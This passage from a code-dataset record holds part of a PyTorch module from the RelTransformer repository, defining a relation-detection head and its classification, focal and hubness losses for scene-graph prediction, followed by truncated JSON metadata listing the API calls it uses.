dumping the shapes for debugging\n\n        position_ids = torch.arange(3, dtype=torch.long, device=sub_visual.device)\n        position_ids = position_ids.unsqueeze(0).expand_as(input_ids[:, :, 0])\n\n        position_ids = self.wpe(position_ids)\n\n        type_ids = torch.tensor([1, 1, 1], dtype=torch.long, device=sub_visual.device)\n        type_ids = type_ids.unsqueeze(0).expand_as(input_ids[:, :, 0])\n        type_ids = self.wte(type_ids)\n\n        input_ids = input_ids + position_ids + type_ids\n        return input_ids\n\n    def forward(self, sub_label, obj_label, sub_visual, obj_visual, label_visual, encoder_features, encoder_mask):\n        if sub_label is None:\n            hidden_states = self.data_transformation_only_visual(sub_visual, obj_visual, label_visual)\n\n            for block in self.h:\n                hidden_states = block(hidden_states, encoder_features, encoder_mask)\n\n            hidden_states = self.linear_projection(hidden_states)\n\n            hidden_states = self.layer_norm(hidden_states)\n\n            return hidden_states[:, 0, :], hidden_states[:, 1, :], hidden_states[:, 2, :]\n\n        else:\n            hidden_states = self.data_transformation(sub_label, obj_label, sub_visual, obj_visual, label_visual)\n\n            # the blocks need the encoder output and mask in this branch as well\n            for block in self.h:\n                hidden_states = block(hidden_states, encoder_features, encoder_mask)\n\n            hidden_states = self.linear_projection(hidden_states)\n\n            hidden_states = 
self.layer_norm(hidden_states)\n\n            return hidden_states[:, 2, :], hidden_states[:, 3, :], hidden_states[:, 4, :]\n\n\nclass reldn_head(nn.Module):\n    def __init__(self, dim_in, all_obj_vecs=None, all_prd_vecs=None):\n        super().__init__()\n\n        num_prd_classes = cfg.MODEL.NUM_PRD_CLASSES + 1\n\n        if cfg.MODEL.RUN_BASELINE:\n            # only used in testing mode\n            self.freq_bias = FrequencyBias(cfg.TEST.DATASETS[0])\n            return\n\n        # pre-computed word vectors for all object and predicate classes\n        self.obj_vecs = all_obj_vecs\n        self.prd_vecs = all_prd_vecs\n\n        # add subnet\n        self.prd_feats = nn.Sequential(\n            nn.Linear(dim_in, 1024),\n            nn.LeakyReLU(0.1))\n        self.prd_vis_embeddings = nn.Sequential(\n            nn.Linear(1024 * 3, 1024),\n            nn.LeakyReLU(0.1),\n            nn.Linear(1024, 1024))\n        # if not cfg.MODEL.USE_SEM_CONCAT:\n        #     self.prd_sem_embeddings = nn.Sequential(\n        #         nn.Linear(cfg.MODEL.INPUT_LANG_EMBEDDING_DIM, 1024),\n        #         nn.LeakyReLU(0.1),\n        #         nn.Linear(1024, 1024))\n        # else:\n        #     self.prd_sem_hidden = nn.Sequential(\n        #         nn.Linear(cfg.MODEL.INPUT_LANG_EMBEDDING_DIM, 1024),\n        #         nn.LeakyReLU(0.1),\n        #         nn.Linear(1024, 1024))\n        #     self.prd_sem_embeddings = nn.Linear(3 * 1024, 1024)\n\n        self.prd_sem_embeddings = nn.Sequential(\n            nn.Linear(cfg.MODEL.INPUT_LANG_EMBEDDING_DIM, 1024),\n            nn.LeakyReLU(0.1),\n            nn.Linear(1024, 1024))\n\n        self.so_vis_embeddings = nn.Linear(dim_in // 3, 1024)\n        self.so_sem_embeddings = nn.Sequential(\n            nn.Linear(cfg.MODEL.INPUT_LANG_EMBEDDING_DIM, 1024),\n            nn.LeakyReLU(0.1),\n            nn.Linear(1024, 1024))\n\n        if cfg.MODEL.USE_FREQ_BIAS:\n            # Assume we are training/testing on only one dataset\n            if len(cfg.TRAIN.DATASETS):\n                self.freq_bias = FrequencyBias(cfg.TRAIN.DATASETS[0])\n            else:\n                self.freq_bias = FrequencyBias(cfg.TEST.DATASETS[0])\n\n        self.multi_head_attention = MultiHeadModel(int(cfg.MODEL.ENCODER_LAYER), 768, 12, 768)\n\n        self.image_encoder = MemoryAugmentedEncoder(2, 0, attention_module=ScaledDotProductAttentionMemory,\n                                                    attention_module_kwargs={'m': 0})\n\n        self._init_weights()\n\n    def _init_weights(self):\n        for m in self.modules():\n            if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n                mynn.init.XavierFill(m.weight)\n                if m.bias is not None:\n                    nn.init.constant_(m.bias, 0)\n            elif isinstance(m, nn.BatchNorm2d):\n                nn.init.constant_(m.weight, 1)\n                nn.init.constant_(m.bias, 0)\n\n        for p in self.multi_head_attention.parameters():\n            if p.dim() > 1:\n                nn.init.xavier_uniform_(p)\n\n        for p in self.image_encoder.parameters():\n            if p.dim() > 1:\n                nn.init.xavier_uniform_(p)\n\n    def forward(self, spo_feat, sbj_labels=None, obj_labels=None, sbj_feat=None, obj_feat=None, all_unique_features=None):\n\n        device_id = spo_feat.get_device()\n        if sbj_labels is not None:\n            sbj_labels = Variable(torch.from_numpy(sbj_labels.astype('int64'))).cuda(device_id)\n        if obj_labels is not None:\n            obj_labels = Variable(torch.from_numpy(obj_labels.astype('int64'))).cuda(device_id)\n\n        if cfg.MODEL.RUN_BASELINE:\n            assert sbj_labels is not None and obj_labels is not None\n            prd_cls_scores = self.freq_bias.rel_index_with_labels(torch.stack((sbj_labels, obj_labels), 1))\n            prd_cls_scores = F.softmax(prd_cls_scores, dim=1)\n            return prd_cls_scores, None, None, None, None, None\n\n        if spo_feat.dim() == 4:\n            spo_feat = spo_feat.squeeze(3).squeeze(2)\n\n        sbj_vis_embeddings = self.so_vis_embeddings(sbj_feat)\n        obj_vis_embeddings = self.so_vis_embeddings(obj_feat)\n\n        prd_hidden = self.prd_feats(spo_feat)\n\n        # feed the data into the image encoder\n        enc_output, mask_enc = self.image_encoder(all_unique_features)\n        # 
print(enc_output.shape, \"encoder output shape \")\n        # print(mask_enc.shape, \"mask encoder shape\")\n\n        # at this point we have the subject visual embeddings, the object visual\n        # embeddings, and the predicate hidden states; next they attend to each\n        # other and to the encoded image regions\n\n        ## get sbj vectors and obj vectors\n        sbj_vecs = self.obj_vecs[sbj_labels]  # (#bs, cfg.MODEL.INPUT_LANG_EMBEDDING_DIM)\n        sbj_vecs = Variable(torch.from_numpy(sbj_vecs.astype('float32'))).cuda(device_id)\n\n        obj_vecs = self.obj_vecs[obj_labels]  # (#bs, cfg.MODEL.INPUT_LANG_EMBEDDING_DIM)\n        obj_vecs = Variable(torch.from_numpy(obj_vecs.astype('float32'))).cuda(device_id)\n\n        sbj_vis_embeddings, obj_vis_embeddings, prd_hidden = self.multi_head_attention(None, None,\n            sbj_vis_embeddings,\n            obj_vis_embeddings, prd_hidden, enc_output, mask_enc)\n\n        # embed the word vectors of all object classes to form the semantic anchors\n        ds_obj_vecs = self.obj_vecs\n        ds_obj_vecs = Variable(torch.from_numpy(ds_obj_vecs.astype('float32'))).cuda(device_id)\n        so_sem_embeddings = self.so_sem_embeddings(ds_obj_vecs)\n\n        so_sem_embeddings = F.normalize(so_sem_embeddings, p=2, dim=1)  # (#obj, 1024)\n        so_sem_embeddings.t_()\n\n        # this is the visual subject embeddings\n        sbj_vis_embeddings = F.normalize(sbj_vis_embeddings, p=2, dim=1)  # (#bs, 1024)\n        sbj_sim_matrix = torch.mm(sbj_vis_embeddings, so_sem_embeddings)  # (#bs, #obj)\n\n        sbj_cls_scores = cfg.MODEL.NORM_SCALE * sbj_sim_matrix\n\n        # this is the visual object embeddings\n        obj_vis_embeddings = F.normalize(obj_vis_embeddings, p=2, dim=1)  # (#bs, 1024)\n        obj_sim_matrix = torch.mm(obj_vis_embeddings, so_sem_embeddings)  # (#bs, #obj)\n        obj_cls_scores = cfg.MODEL.NORM_SCALE * obj_sim_matrix\n\n        # predict the predicate features from the (detached) subject/object visual\n        # embeddings together with the attended predicate hidden state\n        prd_features = torch.cat((sbj_vis_embeddings.detach(), prd_hidden, obj_vis_embeddings.detach()), dim=1)\n\n        prd_vis_embeddings = self.prd_vis_embeddings(prd_features)\n\n        ds_prd_vecs = self.prd_vecs\n        ds_prd_vecs = Variable(torch.from_numpy(ds_prd_vecs.astype('float32'))).cuda(device_id)\n        prd_sem_embeddings = self.prd_sem_embeddings(ds_prd_vecs)\n        prd_sem_embeddings = F.normalize(prd_sem_embeddings, p=2, dim=1)  # (#prd, 1024)\n        prd_vis_embeddings = F.normalize(prd_vis_embeddings, p=2, dim=1)  # (#bs, 1024)\n        prd_sim_matrix = torch.mm(prd_vis_embeddings, prd_sem_embeddings.t_())  # (#bs, #prd)\n        prd_cls_scores = cfg.MODEL.NORM_SCALE * prd_sim_matrix\n\n        if cfg.MODEL.USE_FREQ_BIAS:\n            assert sbj_labels is not None and obj_labels is not None\n            prd_cls_scores = prd_cls_scores + self.freq_bias.rel_index_with_labels(\n                torch.stack((sbj_labels, obj_labels), 1))\n\n        if not self.training:\n            sbj_cls_scores = F.softmax(sbj_cls_scores, dim=1)\n            obj_cls_scores = F.softmax(obj_cls_scores, dim=1)\n            prd_cls_scores = F.softmax(prd_cls_scores, dim=1)\n\n        return prd_cls_scores, sbj_cls_scores, obj_cls_scores\n\n\ndef add_cls_loss(cls_scores, labels, weight=None):\n    if cfg.MODEL.LOSS == 'cross_entropy':\n        return F.cross_entropy(cls_scores, labels)\n    elif cfg.MODEL.LOSS == 'weighted_cross_entropy':\n        return F.cross_entropy(cls_scores, labels, weight=weight)\n    elif cfg.MODEL.LOSS == 'focal':\n        cls_scores_exp = cls_scores.unsqueeze(2)\n        cls_scores_exp = cls_scores_exp.unsqueeze(3)\n        labels_exp = labels.unsqueeze(1)\n        labels_exp = 
labels_exp.unsqueeze(2)\n        return focal_loss.focal_loss(cls_scores_exp, labels_exp, alpha=cfg.MODEL.ALPHA, gamma=cfg.MODEL.GAMMA,\n                                     reduction='mean')\n    elif cfg.MODEL.LOSS == 'weighted_focal':\n        cls_scores_exp = cls_scores.unsqueeze(2)\n        cls_scores_exp = cls_scores_exp.unsqueeze(3)\n        labels_exp = labels.unsqueeze(1)\n        labels_exp = labels_exp.unsqueeze(2)\n        weight = weight.unsqueeze(0)\n        weight = weight.unsqueeze(2)\n        weight = weight.unsqueeze(3)\n        return focal_loss.focal_loss(cls_scores_exp, labels_exp, alpha=cfg.MODEL.ALPHA, gamma=cfg.MODEL.GAMMA,\n                                     reduction='mean', weight_ce=weight)\n    else:\n        raise NotImplementedError\n\n\ndef add_hubness_loss(cls_scores):\n    # xp_yall_prob   (batch_size, num_classes)\n    # xp_yall_prob.T (num_classes, batch_size)\n    # xp_yall_prob.expand(0, 1, -1, 1)\n    # xp_yall_probT_average_reshape = xp_yall_probT_reshaped.mean(axis=2)\n    # hubness_dist = xp_yall_probT_average_reshape - hubness_blob\n    # hubness_dist_sqr = hubness_dist.pow(2)\n    # hubness_dist_sqr_scaled = hubness_dist_sqr * cfg.TRAIN.HUBNESS_SCALE\n    cls_scores = F.softmax(cls_scores, dim=1)\n    hubness_blob = 1. / cls_scores.size(1)\n    cls_scores_T = cls_scores.transpose(0, 1)\n    cls_scores_T = cls_scores_T.unsqueeze(1).unsqueeze(3).expand(-1, 1, -1, 1)\n    cls_scores_T = cls_scores_T.mean(dim=2, keepdim=True)\n    hubness_dist = cls_scores_T - hubness_blob\n    hubness_dist = hubness_dist.pow(2) * cfg.TRAIN.HUBNESS_SCALE\n    hubness_loss = hubness_dist.mean()\n    return hubness_loss\n\n\ndef reldn_losses(prd_cls_scores, prd_labels_int32, fg_only=False, weight=None):\n    device_id = prd_cls_scores.get_device()\n    prd_labels = Variable(torch.from_numpy(prd_labels_int32.astype('int64'))).cuda(device_id)\n    if cfg.MODEL.LOSS == 'weighted_cross_entropy' or cfg.MODEL.LOSS == 'weighted_focal':\n        weight = Variable(torch.from_numpy(weight)).cuda(device_id)\n    loss_cls_prd = add_cls_loss(prd_cls_scores, prd_labels, weight=weight)\n    # class accuracy\n    prd_cls_preds = prd_cls_scores.max(dim=1)[1].type_as(prd_labels)\n    accuracy_cls_prd = prd_cls_preds.eq(prd_labels).float().mean(dim=0)\n\n    return loss_cls_prd, accuracy_cls_prd\n\n\ndef reldn_so_losses(sbj_cls_scores, obj_cls_scores, sbj_labels_int32, obj_labels_int32):\n    device_id = sbj_cls_scores.get_device()\n\n    sbj_labels = Variable(torch.from_numpy(sbj_labels_int32.astype('int64'))).cuda(device_id)\n    loss_cls_sbj = add_cls_loss(sbj_cls_scores, sbj_labels)\n    sbj_cls_preds = sbj_cls_scores.max(dim=1)[1].type_as(sbj_labels)\n    accuracy_cls_sbj = sbj_cls_preds.eq(sbj_labels).float().mean(dim=0)\n\n    obj_labels = Variable(torch.from_numpy(obj_labels_int32.astype('int64'))).cuda(device_id)\n    loss_cls_obj = add_cls_loss(obj_cls_scores, obj_labels)\n    obj_cls_preds = obj_cls_scores.max(dim=1)[1].type_as(obj_labels)\n    accuracy_cls_obj = obj_cls_preds.eq(obj_labels).float().mean(dim=0)\n\n    return loss_cls_sbj, loss_cls_obj, accuracy_cls_sbj, accuracy_cls_obj\n\n", "repo_name": "Vision-CAIR/RelTransformer", "sub_path": "lib/modeling/reldn_heads_reltransformer.py", "file_name": "reldn_heads_reltransformer.py", "file_ext": "py", "file_size_in_byte": 23380, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 27, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "transformer.Conv1D_", "line_number": 35, "usage_type": "call"}, {"api_name": "transformer.Conv1D_", 
"line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 41, "usage_type": "call"}, {"api_name": "transformer.Conv1D_", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "transformer.Conv1D_", "line_number": 112, "usage_type": "call"}, {"api_name": "transformer.Conv1D_", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 115, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 117, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 119, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 124, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 125, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 126, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 126, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 128, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 128, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 129, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 130, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 137, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 148, "usage_type": "call"}, {"api_name": 
"torch.nn", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 189, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 189, "usage_type": "name"}, {"api_name": "transformer.Conv1D_", "line_number": 193, "usage_type": "call"}, {"api_name": "transformer.Conv1D_", "line_number": 194, "usage_type": "call"}, {"api_name": "transformer.gelu", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 203, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 203, "usage_type": "name"}, {"api_name": "transformer.LayerNorm", "line_number": 210, "usage_type": "call"}, {"api_name": "transformer.LayerNorm", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 214, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 218, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 219, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 219, "usage_type": "name"}, {"api_name": "torch.sigmoid", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 259, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 267, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 268, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 270, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 271, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 273, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 275, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 277, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 278, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 295, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 303, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 303, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 308, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 308, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 331, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 338, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 338, "usage_type": 
"attribute"}, {"api_name": "torch.tensor", "line_number": 343, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 343, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 394, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 394, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 398, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 398, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 400, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 400, "usage_type": "name"}, {"api_name": "modeling.sparse_targets_rel.FrequencyBias", "line_number": 402, "usage_type": "call"}, {"api_name": "core.config.cfg.TEST", "line_number": 402, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 402, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 410, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 410, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 411, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 411, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 412, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 412, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 413, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 413, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 414, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 414, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 415, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 415, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 416, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 416, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 429, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 429, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 430, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 430, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 430, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 430, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 431, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 431, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 432, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 432, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 434, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 434, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 435, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 435, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 436, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 436, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 436, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 436, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 437, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 437, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 438, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 438, "usage_type": "name"}, {"api_name": 
"core.config.cfg.MODEL", "line_number": 440, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 440, "usage_type": "name"}, {"api_name": "core.config.cfg.TRAIN", "line_number": 442, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 442, "usage_type": "name"}, {"api_name": "modeling.sparse_targets_rel.FrequencyBias", "line_number": 443, "usage_type": "call"}, {"api_name": "core.config.cfg.TRAIN", "line_number": 443, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 443, "usage_type": "name"}, {"api_name": "modeling.sparse_targets_rel.FrequencyBias", "line_number": 445, "usage_type": "call"}, {"api_name": "core.config.cfg.TEST", "line_number": 445, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 445, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 447, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 447, "usage_type": "name"}, {"api_name": "image_encoder.MemoryAugmentedEncoder", "line_number": 449, "usage_type": "call"}, {"api_name": "attention.ScaledDotProductAttentionMemory", "line_number": 449, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 456, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 456, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 456, "usage_type": "attribute"}, {"api_name": "nn.init.XavierFill", "line_number": 457, "usage_type": "call"}, {"api_name": "nn.init", "line_number": 457, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 459, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 459, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 459, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 460, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 460, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 461, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 461, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 461, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 462, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 462, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 462, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 466, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 466, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 466, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 470, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 470, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 470, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 479, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 479, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 481, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 481, "usage_type": "call"}, {"api_name": "core.config.cfg.MODEL", "line_number": 485, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 485, "usage_type": "name"}, {"api_name": "torch.stack", "line_number": 487, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 488, "usage_type": "call"}, {"api_name": "torch.nn.functional", 
"line_number": 488, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 528, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 528, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 531, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 531, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 546, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 546, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 549, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 549, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 558, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 558, "usage_type": "name"}, {"api_name": "torch.mm", "line_number": 559, "usage_type": "call"}, {"api_name": "core.config.cfg.MODEL", "line_number": 561, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 561, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 564, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 564, "usage_type": "name"}, {"api_name": "torch.mm", "line_number": 565, "usage_type": "call"}, {"api_name": "core.config.cfg.MODEL", "line_number": 566, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 566, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 580, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 585, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 585, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 587, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 587, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 588, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 588, "usage_type": "name"}, {"api_name": "torch.mm", "line_number": 589, "usage_type": "call"}, {"api_name": "core.config.cfg.MODEL", "line_number": 590, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 590, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 592, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 592, "usage_type": "name"}, {"api_name": "torch.stack", "line_number": 595, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 598, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 598, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 599, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 599, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 600, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 600, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 606, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 606, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 607, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 607, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 608, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 608, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", 
